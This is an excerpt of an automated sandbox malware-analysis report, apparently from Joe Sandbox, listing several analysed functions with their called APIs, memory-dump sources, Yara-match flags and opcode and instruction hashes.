                                                                                                                                                                                          • Instruction ID: ae3f868f29400208f6b2d319e20e5a0fb722a258300872c93a841e7ee43a8742
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF06D32601224A7EB504DEBAC80B4B36DC9B456BDF141271EE28CF781EBA1CC4286A1
                                                                                                                                                                                          Function 0003F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameName::
                                                                                                                                                                                          • String ID: {flat}
                                                                                                                                                                                          • API String ID: 1333004437-2606204563
                                                                                                                                                                                          • Opcode ID: 2cdcdfb13c8b24744e987fa215c9dcbdd1ebb3ce8af76c9d742fe7d04c38d5b6
                                                                                                                                                                                          • Instruction ID: 753c0845a4c486879cbba9b5b7c11ee5e45bcffe5f3a5f6f13099d468367ab72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdcdfb13c8b24744e987fa215c9dcbdd1ebb3ce8af76c9d742fe7d04c38d5b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F0ED3194424A9FCB12DF68D445BF87FA8AF81755F088085FA4C0F293C770E981CB91
                                                                                                                                                                                          Function 6C426C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0KEl,?,6C454B30,80000000,?,6C454AB7,?,6C4143CF,?,6C4142D2), ref: 6C426C42
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0KEl,?,6C454B30,80000000,?,6C454AB7,?,6C4143CF,?,6C4142D2), ref: 6C426C58
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: moz_xmalloc$malloc
                                                                                                                                                                                          • String ID: 0KEl
                                                                                                                                                                                          • API String ID: 1967447596-1688916911
                                                                                                                                                                                          • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                          • Instruction ID: 1335ceef0460b644b895be5eef35bed30b46130b3366093175f6006b55c150d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E086F1A105054AAB08E97AAC0BEAB71C88B142E97044A39EC22D7BCCFA5CE55081D1
                                                                                                                                                                                          Function 0002141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 587104284-2766056989
                                                                                                                                                                                          • Opcode ID: 9f9eb431ea625b83a3d30ef9b6ea1d883c649684a78f1fca56f9a3df0f9c81e3
                                                                                                                                                                                          • Instruction ID: d92c8b63c5f4bce107418c2e511f0e679b45f18c6240baafd0d3c0d33ec75e3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f9eb431ea625b83a3d30ef9b6ea1d883c649684a78f1fca56f9a3df0f9c81e3
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E0BFF49002089BDB50EFA4E946B9EB7B8AB08704F500026AA05E72C2E674BA099B55
                                                                                                                                                                                          Function 6C590DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                          • Opcode ID: fa289fb033873f598b81c9f30b6a5cf43740cf3ef6a86e2659899ae7fc7d9ad3
                                                                                                                                                                                          • Instruction ID: afd1e65dcd3bb05dfaab5adee8dfe6eb6c9cd7313a9dda76c4f710cba5028ba4
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa289fb033873f598b81c9f30b6a5cf43740cf3ef6a86e2659899ae7fc7d9ad3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E31F470A453D1CBDB00AF39CC8565977B8BF8E308F114EABD89887A50EB348485CB86